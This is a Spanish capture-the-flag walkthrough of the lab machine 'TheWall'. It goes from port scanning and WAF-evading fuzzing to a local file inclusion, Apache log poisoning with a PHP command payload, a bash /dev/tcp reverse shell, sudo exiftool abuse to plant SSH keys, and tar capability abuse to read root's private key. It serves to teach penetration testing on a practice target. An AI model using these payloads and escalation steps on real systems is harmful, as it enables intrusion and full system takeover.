Comenzamos con la enumeración de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.32
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.32
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-07 17:56 -04
Nmap scan report for 192.168.1.32
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 89:60:29:db:68:6d:13:34:98:b9:d0:17:24:56:a8:9e (RSA)
| 256 66:58:51:6d:cd:3a:67:46:36:56:9a:31:a0:08:13:cf (ECDSA)
|_ 256 f7:34:9e:53:68:ba:c2:06:ab:14:c3:21:90:2d:6e:64 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.54 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.97 secondsDetectamos un WAF que bloquea las conexiones tras un tiempo, así que enumeramos con gobuster a baja velocidad (delay y un solo hilo):
❯ whatwaf -u http://192.168.1.32
...
[22:27:43][FIREWALL] detected website protection identified as 'Apache Generic'
...
❯ gobuster dir -u 'http://192.168.1.32' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php --delay 1s -t 2
...
/index.php
/includes.php (Status: 200) [Size: 2]
.../includes.php no está protegido por el WAF, así que fuzzeamos sus parámetros en busca de LFI y damos con display_page:
❯ ffuf -u 'http://192.168.1.32/includes.php?FUZZ=../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --fw 1
...
display_page [Status: 200, Size: 1460, Words: 15, Lines: 29, Duration: 101ms]
...
❯ curl 'http://192.168.1.32/includes.php?display_page=/etc/passwd' | grep home
john:x:1000:1000:,,,:/home/john:/bin/bashLocalizamos el log de Apache y hacemos log poisoning inyectando PHP en el User-Agent:
❯ ffuf -u 'http://192.168.1.32/includes.php?display_page=FUZZ' -w ~/Documentos/wordlists/LFI_payloads.txt --fw 1
...
/var/log/apache2/access.log [Status: 200, Size: 51854043, ...]
...GET /includes.php?display_page=/var/log/apache2/access.log&0=bash+-c+"bash+-i+>%26+/dev/tcp/192.168.1.10/1234+0>%261" HTTP/1.1
User-Agent: <?php system($_GET[0]); ?>Ya como www-data, revisamos sudo -l:
www-data@TheWall:/home/john$ sudo -l
Matching Defaults entries for www-data on TheWall:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on TheWall:
(john : john) NOPASSWD: /usr/bin/exiftoolexiftool como john permite escribir archivos (con -filename). Generamos una clave SSH y usamos exiftool para colocar nuestro authorized_keys en el home de john:
❯ ssh-keygen -t rsa
...www-data@TheWall:/tmp$ echo 'ssh-rsa ... > authorized_keys
www-data@TheWall:/tmp$ sudo -u john exiftool -filename=/home/john/.ssh/authorized_keys authorized_keys
Warning: Error removing old file - authorized_keys
1 image files updated
❯ ssh john@192.168.1.32 -i id_rsa
john@TheWall:~$Obtenemos la primera flag. Para escalar, listamos las capabilities (Linux Capabilities Privesc):
john@TheWall:~$ /usr/sbin/getcap -r / 2>/dev/null
...
/usr/sbin/tar cap_dac_read_search=ep
...En la raíz hay una id_rsa de root. tar con cap_dac_read_search permite leer cualquier archivo saltándose los permisos, así que comprimimos la clave de root y la extraemos:
john@TheWall:~$ /usr/sbin/tar -czf id_rsa.tar.gz /id_rsa
/usr/sbin/tar: Removing leading `/' from member names
john@TheWall:~$ tar -xvf id_rsa.tar.gz
john@TheWall:~$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----La copiamos a nuestra máquina y nos conectamos como root:
❯ ssh root@192.168.1.32 -i id_rsa_root
root@TheWall:~#Obtenemos nuestra flag.
Fin.